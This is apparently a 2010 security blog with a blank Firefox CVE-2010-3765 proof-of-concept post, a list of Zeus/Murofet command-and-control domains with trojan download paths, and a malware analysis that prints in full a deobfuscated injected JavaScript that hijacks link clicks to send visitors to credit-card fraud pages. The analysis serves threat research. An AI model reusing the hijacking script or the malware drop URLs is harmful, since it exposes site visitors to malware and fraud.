Thursday, October 28, 2010

CVE-2010-3765 - proof of concept - update

October, 29 1010 - UPDATE: the working exploit (in according with BugX blog): 
http://bugix-security.blogspot.com/2010/10/firefox-exploitcve-2010-3765.html
   
October, 28 2010
For those who still do not know .. The proof of concept for CVE-2010-3765 is the following:



 
















More details at: https://bugzilla.mozilla.org/show_bug.cgi?id=607222. The issue seem resolved with Firefox 3.6.12.

As mentioned in some of my old posts reading a bugzilla repository is always a good thing:

http://extraexploit.blogspot.com/2010/02/firefox-36-0day-trying-to-find-more.html


Feedback are welcome.

Thursday, October 14, 2010

Some domains for the LICAT / Murofet / Trojan/ZBOT.B threat

Update (2 November): A deep and very itneresting analysis from Trend Micro:
http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/file-patching_zbot_variants_-_zeus_2.0_levels_up__oct_2010_.pdf

Update (15 October):  ThreatExpert has release the domain name generation algorithm for MUROFET/Licat
http://blog.threatexpert.com/2010/10/domain-name-generator-for-murofet.html

(14 October)
I have found some new domains involved in this threat as you can see in the following list:

lrulqnsknrngii.com/news/?s=333
oxgtnnefurwoym.com/news/?s=333
ppmnvoykjkpznso.info/news/?s=333
qqwnudmsqzkyvnig.info/news/?s=333
rrpgrrvlospmndum.com/news/?s=333
sprkslhjshwdcomn.com/news/?s=333
tnjulxjrlletzj.org/news/?s=333
xrfrpevxvjbimup.info/news/?s=333
xrfrpevxvjbimup.info/news/?s=111
hsosqykotrpsapxb.com/news/?s=333

The 333 value for “s” URL parameter permit to download what is recognized as Trojan/ZBot.B (Symantec name). While the 111 stand for , “get Zeus 2.1 (as named by Zeustracker) config fil"e”. The drop zone is requested with the following syntax:

<domainname>.<tld>/news/

This malware seem use a C&C domain name generation approach similar to that used by conficker.  For example, the latest domain (hsosqykotrpsapxb.com/news/?s=333 ) seem registered for the 14th of October 2010 malware activity as reported by http://domain-daily.com/
 

The following Anubis Binary Analaysis submission show the behavioral of this malware:
http://anubis.iseclab.org/?action=result&task_id=1215b9b1d959c52e4bdd0ff4a38062aa3&call=first

and the ThreatExpert analysis with detection engine info:
http://www.threatexpert.com/report.aspx?md5=1e940baeb962042a6628f81c93aaecd1

The domains above seems hosted by the following IP address:
195.189.226.107
 

The following Robtex table permits to retrieve other domains involved:
http://www.robtex.com/ip/195.189.226.107.html

Wednesday, October 6, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds ( and black hat seo ) – part 0.2

Trying to find some common factors in the pages included in the compromised sites (as indicated in the previous post (http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another.html) there is evidence of a large number of sites that are suffering the same problem. In particular, using keywords that are common to many of these malicious pages, you have the following results:

sshot002
As well:

ssho001
Yet another dork that retrieve very similar URL format:
sshot003
This can reasonably confirm that this stuff is related to a big (and well organized) Black Hat Seo campaign. Thank you very much for their support to Edgar Tools and author of JJEncode .

Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25,  2011 – Update:
a detailed analysis also where is reported my post:
Internet  Explorer exSploit Milk codes
http://utf-8.jp/public/20101106/avtokyo.pptx


October 5, 2010:

From MDL forum, I get a post where a user (many thanks to Edgar) has been reported a strange Javascript code injected in some Italian web site. Specifically the message is located at the following URL:
 http://www.malwaredomainlist.com/forums/index.php?topic=4354.0
The code that is reported looks like shown in the following screenshot:
dollarscode001

At first lookup appears like a nonsense code for who is not a Javascript guru like me. So I decide to try to decode this very interesting code for try to know what this code do.  The first step it’s been try to use some Javascript alert() function call in the prologue code. So  the first lines of code are been modified as following:
dollarscode002
The blue pills shown the place where the alert() has been placed. Trying to execute this abstract of code the alert call sequence has generated these results:
dollarscode003
dollarscode004
dollarscode005
dollarscode006
dollarscode007
The rest of code deobfuscation is obtained placing within a textarea the code referenced by “Function()” as follow:
dollarscode008
also the end of obfuscated code must be modified as shown:
dollarscode009
Once this modified code is placed in a test HTML page and rendered by Firefox, it’s been obtained this deobfuscated jquery code:
page_links = [];
        function setGlobalOnLoad(f) {
           var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
           if (root){
              if(root.addEventListener) root.addEventListener("load", f, false)
              else if(root.attachEvent) root.attachEvent("onload", f)
           } else {
              if(typeof window.onload == 'function') {
                 var existing = window.onload
                 window.onload = function() {
                    existing()
                    f()
                 }
              } else {
                 window.onload = f
              }
           }
        }
        function addHandler(object, event, handler) {
          if (typeof object.addEventListener != 'undefined')
            object.addEventListener(event, handler, false);
          else if (typeof object.attachEvent != 'undefined')
            object.attachEvent('on' + event, handler);
        }

        if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
            var right_browser='yes';
            }else     var right_browser='no';

        function getCookie(c_name)
        {
        if (document.cookie.length>0)
          {
          c_start=document.cookie.indexOf(c_name + "=");
          if (c_start!=-1)
            {
            c_start=c_start + c_name.length+1;
            c_end=document.cookie.indexOf(";",c_start);
            if (c_end==-1) c_end=document.cookie.length;
            return unescape(document.cookie.substring(c_start,c_end));
            }
          }
        return "";
        }
        var c_index = Math.floor(Math.random() * 5);       
        var fcoo=getCookie('c_first');       
        var exdate=new Date();
        exdate.setDate(exdate.getDate()+365);
        document.cookie='c_first'+ "=" +escape('false')+";expires="+exdate.toUTCString();
        if (c_index==4 && fcoo!='false' && right_browser=='yes') {
            setGlobalOnLoad(function() {
            var block = document.getElementById('mlk');
            var links = block.getElementsByTagName('A');
            for (var i = 0; i < links.length; i++) {
                page_links.push(links[i].href);
            }
            var links = document.links;
            for (var i = 0; i < links.length; i++) {
                addHandler(links[i], "click", function(event) {
                    var index = Math.floor(Math.random() * (page_links.length - 1));
                    event.target.href = page_links[index];
                });
            }
        });
Update: the code it’s been obuscated using the following encoding script:
http://utf-8.jp/public/jjencode.html  (Mowab thank you very much for your support).
The obtained code, at first sight seems a loader of the href object injected in the compromised web page (as shown along). Also the bolded line of code:
var block = document.getElementById('mlk');
is the object assignment which contain the link to the malicious HTML page injected within the compromised hosts. In particular all server listed and reported by the MDL post seems reference URL like these:
dollarscode010
The HTML page injected lead to a to a black listed site as credit card fraud. In this case the compromised host analyzed is bisteccheriadabaffo.it. Calling , for example,
bisteccheriadabaffo.it/modules/com_easycaptcha/desert-highlands-golf-p-699.html
is retrieved this page:
dollarscode011
Clicking on one of the download buttons appear a CAPTCHA request as following:
dollarscode012
Clicking on download button is called the following URL:
hzzzzp://turbo-speed-downloads.com/download.php?file=1506495%20Cranberry%20Highlands%20Golf%20Course%20gsm%20userschoise%2097%20302.rar

Following the download sequence appear a message that entice the user to signup for download the desired file:

dollarscode014
Trying to sign up, is shown a fake promotional message like this:
dollarscode015
The checkout action try to contact this website
hxxxxps://purchase.shopeasydeals.com/
that is black listed for credit card frauds as noticed by MyWOT  response
http://www.mywot.com/en/scorecard/purchase.shopeasydeals.com
dollarscode016
I think that the compromised hosts , as reported at the begin of this post, have been implicated for a Black Hat Seo infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.